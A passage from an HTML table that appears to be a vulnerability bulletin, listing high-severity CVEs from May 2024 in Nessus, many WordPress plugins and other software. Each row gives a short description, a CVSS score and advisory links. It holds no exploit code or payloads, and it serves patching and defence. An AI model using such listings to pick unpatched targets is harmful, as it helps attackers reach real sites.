<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3291" target="_blank">CVE-2024-3291</a><br><a href="https://www.tenable.com/security/tns-2024-09" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>Tenable--Nessus<br> </td>
<td>A race condition vulnerability exists where an authenticated, local attacker on a Windows Nessus host could modify installation parameters at installation time, which could lead to the execution of arbitrary code on the Nessus host</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3290&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3290" target="_blank">CVE-2024-3290</a><br><a href="https://www.tenable.com/security/tns-2024-08" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>Tenable--Nessus<br> </td>
<td>When installing Nessus to a directory outside of the default location on a Windows host, Nessus versions prior to 10.7.3 did not enforce secure permissions for sub-directories. This could allow for local privilege escalation if users had not secured the directories in the non-default installation location.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3289&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3289" target="_blank">CVE-2024-3289</a><br><a href="https://www.tenable.com/security/tns-2024-08" target="_blank">vulnreport@tenable.com</a></td>
</tr>
<tr>
<td>Teplitsa of social technologies--Leyka<br> </td>
<td>Improper Privilege Management vulnerability in Teplitsa of social technologies Leyka allows Privilege Escalation.This issue affects Leyka: from n/a through 3.30.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-33327&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-33327" target="_blank">CVE-2023-33327</a><br><a href="https://patchstack.com/database/vulnerability/leyka/wordpress-leyka-plugin-3-29-2-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ThemeKraft--BuddyForms<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in ThemeKraft BuddyForms allows Server Side Request Forgery, Relative Path Traversal.This issue affects BuddyForms: from n/a through 2.8.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32830&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">8.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32830" target="_blank">CVE-2024-32830</a><br><a href="https://patchstack.com/database/vulnerability/buddyforms/wordpress-buddyforms-plugin-2-8-8-arbitrary-file-read-and-ssrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ThemeNectar--Salient Core<br> </td>
<td>The Salient Core plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.7 via the 'nectar_icon' shortcode 'icon_linea' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3812&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3812" target="_blank">CVE-2024-3812</a><br><a href="https://themeforest.net/item/salient-responsive-multipurpose-theme/4363266" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ebd3b70e-a06a-4dcc-a6af-dbe64fd57c82?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>ThemeNectar--Salient Shortcodes<br> </td>
<td>The Salient Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.3 via the 'icon' shortcode 'image' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3810&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3810" target="_blank">CVE-2024-3810</a><br><a href="https://themeforest.net/item/salient-responsive-multipurpose-theme/4363266" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d1b3d4d5-9d2b-4924-a830-27c07fa1ba98?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>Themify--Themify Ultra<br> </td>
<td>Improper Privilege Management vulnerability in Themify Themify Ultra allows Privilege Escalation.This issue affects Themify Ultra: from n/a through 7.3.5.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-46145&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-46145" target="_blank">CVE-2023-46145</a><br><a href="https://patchstack.com/database/vulnerability/themify-ultra/wordpress-themify-ultra-theme-7-3-3-authenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Thomas Scholl--canvasio3D Light<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in Thomas Scholl canvasio3D Light.This issue affects canvasio3D Light: from n/a through 2.5.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34411&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34411" target="_blank">CVE-2024-34411</a><br><a href="https://patchstack.com/database/vulnerability/canvasio3d-light/wordpress-canvasio3d-light-plugin-2-5-0-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Thrive Themes--Thrive Theme Builder<br> </td>
<td>Improper Privilege Management vulnerability in Thrive Themes Thrive Theme Builder allows Privilege Escalation.This issue affects Thrive Theme Builder: from n/a before 3.24.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-47782&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-47782" target="_blank">CVE-2023-47782</a><br><a href="https://patchstack.com/database/vulnerability/thrive-theme/wordpress-thrive-theme-builder-theme-3-20-1-authenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>ThroughTek--Kalay SDK<br> </td>
<td>ThroughTek Kalay SDK uses a predictable PSK value in the DTLS session when encountering an unexpected PSK identity</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-6324&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" target="_blank" title="CVSS V3 Score">8.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6324" target="_blank">CVE-2023-6324</a><br><a href="https://bitdefender.com/blog/labs/notes-on-throughtek-kalay-vulnerabilities-and-their-impact/" target="_blank">cve-requests@bitdefender.com</a></td>
</tr>
<tr>
<td>Timber Team &amp; Contributors--Timber<br> </td>
<td>Deserialization of Untrusted Data vulnerability in Timber Team &amp; Contributors Timber.This issue affects Timber: from n/a through 1.23.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-29800&amp;vector=CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-29800" target="_blank">CVE-2024-29800</a><br><a href="https://patchstack.com/database/vulnerability/timber-library/wordpress-timber-plugin-1-23-0-deserialization-of-untrusted-data-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Tips and Tricks HQ--WP Express Checkout (Accept PayPal Payments)<br> </td>
<td>Improper Validation of Specified Quantity in Input vulnerability in Tips and Tricks HQ WP Express Checkout (Accept PayPal Payments) allows Manipulating Hidden Fields.This issue affects WP Express Checkout (Accept PayPal Payments): from n/a through 2.3.7.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30527&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30527" target="_blank">CVE-2024-30527</a><br><a href="https://patchstack.com/database/vulnerability/wp-express-checkout/wordpress-wp-express-checkout-plugin-2-3-7-price-manipulation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Trellix--ePolicy Orchestrator<br> </td>
<td>Hardcoded credentials vulnerability in Trellix ePolicy Orchestrator (ePO) on Premise prior to 5.10 Service Pack 1 Update 2 allows an attacker with admin privileges on the ePO server to read the contents of the orion.keystore file, allowing them to access the ePO database encryption key. This was possible through using a hard coded password for the keystore. Access Control restrictions on the file mean this would not be exploitable unless the user is the system admin for the server that ePO is running on.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4844&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4844" target="_blank">CVE-2024-4844</a><br><a href="https://thrive.trellix.com/s/article/000013505" target="_blank">trellixpsirt@trellix.com</a></td>
</tr>
<tr>
<td>URBAN BASE--Z-Downloads<br> </td>
<td>Unrestricted Upload of File with Dangerous Type vulnerability in URBAN BASE Z-Downloads.This issue affects Z-Downloads: from n/a through 1.11.3.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34555&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34555" target="_blank">CVE-2024-34555</a><br><a href="https://patchstack.com/database/vulnerability/z-downloads/wordpress-z-downloads-plugin-1-11-3-arbitrary-file-upload-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>UkrSolution--Barcode Scanner with Inventory &amp; Order Manager<br> </td>
<td>Improper Privilege Management vulnerability in UkrSolution Barcode Scanner with Inventory &amp; Order Manager allows Privilege Escalation.This issue affects Barcode Scanner with Inventory &amp; Order Manager: from n/a through 1.5.3.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33567&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33567" target="_blank">CVE-2024-33567</a><br><a href="https://patchstack.com/database/vulnerability/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders/wordpress-barcode-scanner-with-inventory-order-manager-plugin-1-5-3-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Vova Anokhin--Shortcodes Ultimate<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Vova Anokhin Shortcodes Ultimate allows Absolute Path Traversal.This issue affects Shortcodes Ultimate: from n/a through 5.12.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-25050&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-25050" target="_blank">CVE-2023-25050</a><br><a href="https://patchstack.com/database/vulnerability/shortcodes-ultimate/wordpress-shortcodes-ultimate-plugin-5-12-6-arbitrary-file-download-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WP Automatic--Automatic<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WP Automatic Automatic allows Path Traversal, Server Side Request Forgery.This issue affects Automatic: from n/a through 3.92.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27954&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N" target="_blank" title="CVSS V3 Score">9.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27954" target="_blank">CVE-2024-27954</a><br><a href="https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-file-download-and-ssrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WP Automatic--Automatic<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in WP Automatic Automatic allows Privilege Escalation.This issue affects Automatic: from n/a through 3.92.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-27955&amp;vector=CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-27955" target="_blank">CVE-2024-27955</a><br><a href="https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WP Hive--Events Rich Snippets for Google<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in WP Hive Events Rich Snippets for Google allows Exploitation of Trusted Credentials.This issue affects Events Rich Snippets for Google: from n/a through 1.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-44478&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-44478" target="_blank">CVE-2023-44478</a><br><a href="https://patchstack.com/database/vulnerability/rich-snippets-vevents/wordpress-events-rich-snippets-for-google-plugin-1-8-csrf-leading-to-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WP Sharks--s2Member Pro<br> </td>
<td>Improper Privilege Management vulnerability in WP Sharks s2Member Pro allows Privilege Escalation.This issue affects s2Member Pro: from n/a through 240315.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31237&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31237" target="_blank">CVE-2024-31237</a><br><a href="https://patchstack.com/database/vulnerability/s2member/wordpress-s2member-plugin-240315-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WP-etracker--WP etracker<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP-etracker WP etracker allows Reflected XSS.This issue affects WP etracker: from n/a through 1.0.2.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34431&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34431" target="_blank">CVE-2024-34431</a><br><a href="https://patchstack.com/database/vulnerability/wp-etracker/wordpress-wp-etracker-plugin-1-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPCustomify--Customify Site Library<br> </td>
<td>Improper Control of Generation of Code ('Code Injection') vulnerability in WPCustomify Customify Site Library allows Code Injection.This issue affects Customify Site Library: from n/a through 0.0.9.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33644&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33644" target="_blank">CVE-2024-33644</a><br><a href="https://patchstack.com/database/vulnerability/customify-sites/wordpress-customify-site-library-plugin-0-0-9-remote-code-execution-rce-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPDeveloper--Essential Addons for Elementor<br> </td>
<td>Improper Privilege Management vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation.This issue affects Essential Addons for Elementor: from n/a through 5.8.8.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41955&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41955" target="_blank">CVE-2023-41955</a><br><a href="https://patchstack.com/database/vulnerability/essential-addons-for-elementor-lite/wordpress-essential-addons-for-elementor-plugin-5-8-8-contributor-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPFactory--EAN for WooCommerce<br> </td>
<td>Improper Privilege Management vulnerability in WPFactory EAN for WooCommerce allows Privilege Escalation.This issue affects EAN for WooCommerce: from n/a through 4.8.9.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34370&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34370" target="_blank">CVE-2024-34370</a><br><a href="https://patchstack.com/database/vulnerability/ean-for-woocommerce/wordpress-ean-for-woocommerce-plugin-4-8-9-arbitrary-option-update-to-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WPvivid Team--WPvivid Backup and Migration<br> </td>
<td>Improper Privilege Management vulnerability in WPvivid Team WPvivid Backup and Migration allows Privilege Escalation.This issue affects WPvivid Backup and Migration: from n/a through 0.9.90.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-41243&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">8.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-41243" target="_blank">CVE-2023-41243</a><br><a href="https://patchstack.com/database/vulnerability/wpvivid-backuprestore/wordpress-wpvivid-backup-plugin-plugin-0-9-90-privilege-escalation-on-staging-environment-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WatchGuard--AuthPoint Password Manager<br> </td>
<td>Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in WatchGuard AuthPoint Password Manager on MacOS allows an a adversary with local access to execute code under the context of the AuthPoint Password Manager application. This issue affects AuthPoint Password Manager for MacOS versions before 1.0.6.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-1417&amp;vector=CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-1417" target="_blank">CVE-2024-1417</a><br><a href="https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2024-00006" target="_blank">5d1c2695-1a31-4499-88ae-e847036fd7e3</a></td>
</tr>
<tr>
<td>WebToffee--WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels<br> </td>
<td>Improper Privilege Management vulnerability in WebToffee WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels allows Privilege Escalation.This issue affects WooCommerce PDF Invoices, Packing Slips, Delivery Notes and Shipping Labels: from n/a through 4.2.1.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-51546&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">7.2</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-51546" target="_blank">CVE-2023-51546</a><br><a href="https://patchstack.com/database/vulnerability/print-invoices-packing-slip-labels-for-woocommerce/wordpress-woocommerce-pdf-invoices-packing-slips-delivery-notes-and-shipping-labels-plugin-4-2-1-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WebWizards--SalesKing<br> </td>
<td>Improper Privilege Management vulnerability in WebWizards SalesKing allows Privilege Escalation.This issue affects SalesKing: from n/a through 1.6.15.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-22157&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-22157" target="_blank">CVE-2024-22157</a><br><a href="https://patchstack.com/database/vulnerability/salesking/wordpress-salesking-plugin-1-6-15-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WebinarPress--WebinarPress<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in WebinarPress.This issue affects WebinarPress: from n/a through 1.33.17.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34818&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">7.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34818" target="_blank">CVE-2024-34818</a><br><a href="https://patchstack.com/database/vulnerability/wp-webinarsystem/wordpress-webinar-plugin-1-33-17-cross-site-request-forgery-csrf-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WhatArmy--WatchTowerHQ<br> </td>
<td>Improper Privilege Management vulnerability in WhatArmy WatchTowerHQ allows Privilege Escalation.This issue affects WatchTowerHQ: from n/a through 3.6.16.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-25701&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-25701" target="_blank">CVE-2023-25701</a><br><a href="https://patchstack.com/database/vulnerability/watchtowerhq/wordpress-watchtowerhq-plugin-3-6-16-privilege-escalation?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Wholesale--WholesaleX<br> </td>
<td>Improper Privilege Management vulnerability in Wholesale WholesaleX allows Privilege Escalation.This issue affects WholesaleX: from n/a through 1.3.2.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-30542&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-30542" target="_blank">CVE-2024-30542</a><br><a href="https://patchstack.com/database/vulnerability/wholesalex/wordpress-wholesalex-plugin-1-3-2-unauthenticated-privilege-escalation-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>Woo product importer--Sharkdropship dropshipping for Aliexpress, eBay, Amazon, etsy<br> </td>
<td>Missing Authorization vulnerability in Woo product importer Sharkdropship dropshipping for Aliexpress, eBay, Amazon, etsy.This issue affects Sharkdropship dropshipping for Aliexpress, eBay, Amazon, etsy: from n/a through 2.1.1.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32724&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" target="_blank" title="CVSS V3 Score">7.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32724" target="_blank">CVE-2024-32724</a><br><a href="https://patchstack.com/database/vulnerability/woo-aliexpress-dropshipping/wordpress-sharkdropship-and-affiliate-for-aliexpress-ebay-amazon-etsy-plugin-2-1-1-arbitrary-content-deletion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>WooCommerce--WooCommerce One Page Checkout<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in WooCommerce WooCommerce One Page Checkout allows PHP Local File Inclusion.This issue affects WooCommerce One Page Checkout: from n/a through 2.3.0.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-35881&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" target="_blank" title="CVSS V3 Score">7.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-35881" target="_blank">CVE-2023-35881</a><br><a href="https://patchstack.com/database/vulnerability/woocommerce-one-page-checkout/wordpress-woocommerce-one-page-checkout-plugin-2-3-0-local-file-inclusion-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>XTemos--Woodmart Core<br> </td>
<td>Improper Privilege Management vulnerability in XTemos Woodmart Core allows Privilege Escalation.This issue affects Woodmart Core: from n/a through 1.0.36.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2023-32244&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" target="_blank" title="CVSS V3 Score">9.8</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-32244" target="_blank">CVE-2023-32244</a><br><a href="https://patchstack.com/database/vulnerability/woodmart-core/wordpress-woodmart-core-plugin-1-0-36-privilege-escalation?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>YARPP--YARPP<br> </td>
<td>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in YARPP allows PHP Local File Inclusion.This issue affects YARPP: from n/a through 5.30.4.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2022-45374&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">7.7</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2022-45374" target="_blank">CVE-2022-45374</a><br><a href="https://patchstack.com/database/vulnerability/yet-another-related-posts-plugin/wordpress-yet-another-related-posts-plugin-yarpp-plugin-5-30-2-local-file-inclusion?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>YMS--VIS Pro<br> </td>
